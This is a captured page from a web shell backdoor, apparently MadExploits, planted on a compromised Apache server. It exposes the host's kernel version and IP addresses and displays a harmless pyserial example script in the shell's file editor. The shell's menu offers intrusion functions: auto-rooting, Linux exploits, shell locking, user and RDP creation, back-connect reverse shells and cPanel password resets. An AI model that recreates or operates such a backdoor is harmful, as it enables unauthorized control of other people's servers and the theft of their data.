Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.12.123.41
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
pyserial-2.6 /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
enhancedserial.py
2.12
KB
-rw-r--r--
port_publisher.py
17.05
KB
-rw-r--r--
port_publisher.sh
1.03
KB
-rw-r--r--
rfc2217_server.py
6.53
KB
-rw-r--r--
scan.py
762
B
-rw-r--r--
scanlinux.py
481
B
-rw-r--r--
scanwin32.py
7.9
KB
-rw-r--r--
setup-miniterm-py2exe.py
609
B
-rw-r--r--
setup-rfc2217_server-py2exe.py
518
B
-rw-r--r--
setup-wxTerminal-py2exe.py
917
B
-rw-r--r--
tcp_serial_redirect.py
10.28
KB
-rw-r--r--
wxSerialConfigDialog.py
11.5
KB
-rw-r--r--
wxSerialConfigDialog.wxg
13.22
KB
-rw-r--r--
wxTerminal.py
13.21
KB
-rw-r--r--
wxTerminal.wxg
5.51
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : scan.py
#! /usr/bin/env python """\ Scan for serial ports. Part of pySerial (http://pyserial.sf.net) (C) 2002-2003 <cliechti@gmx.net> The scan function of this module tries to open each port number from 0 to 255 and it builds a list of those ports where this was successful. """ import serial def scan(): """scan for available ports. return a list of tuples (num, name)""" available = [] for i in range(256): try: s = serial.Serial(i) available.append( (i, s.portstr)) s.close() # explicit close 'cause of delayed GC in java except serial.SerialException: pass return available if __name__=='__main__': print "Found ports:" for n,s in scan(): print "(%d) %s" % (n,s)
Close